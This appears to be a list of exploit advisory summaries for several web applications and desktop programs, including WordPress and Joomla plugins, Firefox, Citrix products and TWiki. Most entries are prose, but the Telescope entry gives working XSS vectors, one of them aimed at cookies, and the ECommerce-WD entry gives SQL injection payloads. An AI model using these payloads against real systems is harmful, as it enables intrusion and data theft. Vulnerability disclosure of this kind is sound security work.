A vulnerability exists in the WP Marketplace 2.4.0 plugin, which allows an attacker to execute arbitrary commands on the vulnerable system. This is due to the fact that the wpmp_pp_ajax_call() action can be called from any post/page, which allows an attacker to call the wp_insert_user() function with malicious parameters. This can be exploited to add a new administrator user to the vulnerable system.
This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability.
WordPress plugin InBoundio Marketing v1.0 is suffer from File/Shell Upload Vulnerability, remote attacker can upload file/shell/backdoor and exec commands.
Free MP3 CD Ripper is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Joomla component Spider FAQ is not filtering data in theme and Itemid parameters and hence affected from SQL injection vulnerability. The vulnerability can be exploited using error based double query injection with theme parameter and xpath injection with Itemid parameter.
Telescope 0.9.2 and below suffer from a persistent cross site scripting vulnerability due to the lack of input sanitisation and validation performed when parsing markdown user input. An authenticated user can include links, images, code blocks and more through markdown, in the form of comments, posts or replies and more. As an example, the following vectors below can be used in comments, posts or replies to trigger the XSS: [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
The Citrix NetScaler SDX platform delivers fully isolated NetScaler instances running on a single appliance. The NITRO SDK allows you to configure and monitor the NetScaler appliance programmatically. NITRO exposes its functionality through REST interfaces. A Cross-Site Scripting vulnerability was found in one of the REST services exposed by the NITRO SDK. Administrators can upload XenServer hotfixes to the Citrix SDX appliance. The REST interface responsible for handling these hotfixes is vulnerable to command injection.
It was discovered that Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. Unauthenticated attackers can download any configuration file stored in this folder, decode passwords stored in these files, and gain privileged access to devices managed by Command Center.
Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple unauthenticated SQL injections available via the advanced search functionality. The vulnerable parameters are search_category_id, sort_order, and filter_manufacturer_ids within the following request: POST /index.php?option=com_ecommercewd&controller=products&task=displayproducts HTTP/1.1 Host: 172.31.16.49 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.31.16.49/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=120 Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2f Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 321 product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Vectors: Parameter: filter_manufacturer_ids (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1) AND 8066=8066 AND (7678=7678&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1) AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(8072=8072,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution.